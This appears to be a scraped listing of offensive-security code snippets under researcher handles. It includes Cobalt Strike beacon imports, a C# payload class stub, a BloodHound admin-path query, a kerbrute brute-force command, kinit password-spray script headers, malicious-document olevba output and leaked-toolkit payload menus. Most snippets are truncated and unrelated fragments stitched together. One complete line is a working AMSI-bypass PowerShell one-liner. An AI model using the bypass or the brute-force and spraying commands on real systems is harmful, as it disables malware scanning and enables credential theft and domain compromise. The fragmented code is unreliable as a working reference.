G0ldenGunSec

#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include "beacon.h"


DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD);
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD);

rvrsh3ll

using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;

public class Payload
{
    public Payload()

leechristensen

Computer accounts added to local admins on machines via a group in the local admins

MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup

Computer accounts added to local admins on machines explicitly

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

xpn

#include "stdafx.h"

int main()
{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;

JohnLaTwC

## uploaded by @JohnLaTwC
## Sample hash: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
OLE:MASI---- 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
===============================================================================
FILE: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
Type: OLE
-------------------------------------------------------------------------------

ropnop

#!/bin/bash

# Title: kinit_user_brute.sh
# Author: @ropnop
# Description: This is a PoC for doing horiztonal password sprays using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)

ropnop

#!/bin/bash

# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful

mattifestation

[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141)

misterch0c

01:06:52>> pc_prep -sharedlib
[01:06:52] ID: 2744 'python' started [target: z0.0.0.20]
- Possible payloads:
-      0) - Quit
-      1) - Standard TCP (i386-winnt Level3 sharedlib)
-      2) - HTTP Proxy (i386-winnt Level3 sharedlib)
-      3) - Standard TCP (x64-winnt Level3 sharedlib)
-      4) - HTTP Proxy (x64-winnt Level3 sharedlib)
-      5) - Standard TCP Generic (i386-winnt Level4 sharedlib)
-      6) - HTTP Proxy Generic (i386-winnt Level4 sharedlib)